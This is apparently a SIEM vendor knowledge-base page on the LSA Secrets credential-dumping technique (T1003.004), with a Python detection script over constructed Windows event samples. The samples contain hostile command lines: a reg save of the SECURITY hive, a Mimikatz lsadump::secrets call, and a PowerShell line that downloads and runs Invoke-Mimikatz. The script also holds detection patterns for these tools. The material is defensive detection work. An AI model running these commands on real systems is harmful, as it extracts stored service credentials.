MaxPatrol SIEM

Detects cyber incidents that undermine a company's cyber resilience

T1003.004: LSA Secrets

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts. LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets. LSA secrets can also be dumped from memory.

Reg (reg.exe) can be used to save the SECURITY hive out of the Registry for offline parsing. Mimikatz can be used to extract the secrets from memory.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

mitre_attck_cred_access: PT-CR-566: LSA_SSP_Change: The values of the registry keys that contain paths of Security Support Provider (SSP) libraries are changed
hacking_tools: PT-CR-585: Impacket_Secretsdump: Use of Impacket Secretsdump is detected
hacking_tools: PT-CR-2118: adPEAS_Usage: The adPEAS script for domain reconnaissance was started
mitre_attck_cred_access: PT-CR-311: Remote_Password_Dump: Remote access to SAMR, WINREG, SVCCTL, and C:\Windows\system32 within 30 seconds of user authentication
hacking_tools: PT-CR-2237: Go_Secdump_Activity: The go-secdump utility was used, which is a tool built to remotely extract hashes from the registry hives without any remote agent and without touching disk
hacking_tools: PT-CR-758: Lazagne_Usage: Use of the LaZagne tool to dump credentials is detected
mitre_attck_cred_access: PT-CR-301: Credential_Dump_in_Local_Registry: Possible dumping of user credentials is detected

Detection

ID: DS0024
Data source and component: Windows Registry: Windows Registry Key Access
Description:

Monitor for access to the registry key HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets, where LSA secrets are stored. The key is not readable by ordinary administrators by default (which is why the technique requires SYSTEM access), so access by any process other than lsass.exe, or by a non-SYSTEM account, is worth investigating. Note that registry object access events (event 4663) are only generated when a SACL is set on the key and the object access / registry audit subcategory is enabled.

ID: DS0017
Data source and component: Command: Command Execution
Description:

Monitor executed commands and arguments that may access Local Security Authority (LSA) secrets, for example reg.exe saving the SECURITY hive (typically together with the SYSTEM hive, whose boot key is needed to decrypt the secrets offline) or Mimikatz's lsadump::secrets module. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, which may require additional logging features (such as PowerShell script block logging or process creation auditing with command-line capture) to be configured in the operating system to collect the necessary information for analysis.
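An added example, not part of the MaxPatrol knowledge base or of MITRE's text, showing both detection points above (DS0024 registry key access and DS0017 command execution) as Python rules run over constructed sample events shaped like Windows Security log records 4663 (object accessed) and 4688 (process created). The sample events, the lsass.exe exclusion list and the command-line patterns are assumptions made for illustration, not rules from the product:

```python
"""T1003.004 detection logic over constructed Windows Security events (added example)."""
import re
from dataclasses import dataclass

# Constructed sample events, shaped like the EventData of Security log records.
# 4663 needs a SACL on the key plus the "Audit Registry" subcategory; 4688 needs
# "Include command line in process creation events". Values are made up.
SAMPLE_EVENTS = [
    {"EventID": 4663, "SubjectUserName": "SYSTEM", "ProcessName": r"C:\Windows\System32\lsass.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SECURITY\Policy\Secrets\_SC_MSSQLSERVER\CurrVal", "AccessMask": "0x1"},
    {"EventID": 4663, "SubjectUserName": "SYSTEM", "ProcessName": r"C:\Windows\System32\reg.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SECURITY\Policy\Secrets", "AccessMask": "0x1"},
    {"EventID": 4688, "SubjectUserName": "SYSTEM", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SECURITY C:\Windows\Temp\sec.hiv"},
    {"EventID": 4688, "SubjectUserName": "bob", "NewProcessName": r"C:\Users\bob\m.exe",
     "CommandLine": 'm.exe "privilege::debug" "token::elevate" "lsadump::secrets" exit'},
    {"EventID": 4688, "SubjectUserName": "bob",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1'); Invoke-Mimikatz\""},
    {"EventID": 4688, "SubjectUserName": "alice", "NewProcessName": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
]

# 4663 reports registry objects with the kernel path, not the HKLM alias.
SECRETS_KEY = r"\REGISTRY\MACHINE\SECURITY\Policy\Secrets"

# lsass.exe reads the key as part of normal operation; without this exclusion the
# rule fires constantly. Keep the list short and match on the full path (assumption).
BENIGN_READERS = {r"c:\windows\system32\lsass.exe"}

# Command-line indicators: reg save/export of the SECURITY or SYSTEM hive, the
# Mimikatz module name, PowerSploit's wrapper, and Impacket's secretsdump.
CMDLINE_PATTERNS = [
    (re.compile(r"\breg(?:\.exe)?\s+(?:save|export)\s+(?:HKLM|HKEY_LOCAL_MACHINE)\\(?:SECURITY|SYSTEM)\b",
                re.I), "reg save of SECURITY/SYSTEM hive"),
    (re.compile(r"lsadump::secrets", re.I), "Mimikatz lsadump::secrets"),
    (re.compile(r"Invoke-Mimikatz", re.I), "PowerSploit Invoke-Mimikatz"),
    (re.compile(r"\bsecretsdump(?:\.py)?\b", re.I), "Impacket secretsdump"),
]


@dataclass
class Alert:
    rule: str
    user: str
    process: str
    detail: str


def check_registry_access(ev):
    """DS0024: any non-excluded process touching the Secrets key (or a subkey)."""
    if ev.get("EventID") != 4663:
        return None
    obj = ev.get("ObjectName", "")
    if not obj.upper().startswith(SECRETS_KEY.upper()):
        return None
    proc = ev.get("ProcessName", "")
    if proc.lower() in BENIGN_READERS:
        return None
    return Alert("LSA secrets key accessed", ev.get("SubjectUserName", ""), proc, obj)


def check_command_line(ev):
    """DS0017: process creation whose command line matches a dumping indicator."""
    if ev.get("EventID") != 4688:
        return None
    cmd = ev.get("CommandLine", "")
    for pattern, label in CMDLINE_PATTERNS:
        if pattern.search(cmd):
            return Alert(label, ev.get("SubjectUserName", ""), ev.get("NewProcessName", ""), cmd)
    return None


def detect(events):
    """Run both checks over a stream of events; one alert per matching event."""
    alerts = []
    for ev in events:
        for check in (check_registry_access, check_command_line):
            alert = check(ev)
            if alert:
                alerts.append(alert)
                break
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] user={a.user} process={a.process} :: {a.detail}")
```

Run against the sample, the lsass.exe read is dropped, the reg.exe read of the key and the three dumping command lines produce alerts, and the benign reg query does not. In a real deployment the registry rule depends on a SACL actually being set on HKLM\SECURITY\Policy\Secrets (which itself requires SYSTEM context or taking ownership of the key), and the command-line rule is only as good as the logging it is fed: 4688 without command-line capture, or Sysmon event 1 as an alternative source.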

Mitigation

ID: M1027
Name: Password Policies
Description:

Ensure that local administrator accounts have complex, unique passwords across all systems on the network.

ID: M1026
Name: Privileged Account Management
Description:

Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.

ID: M1017
Name: User Training
Description:

Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.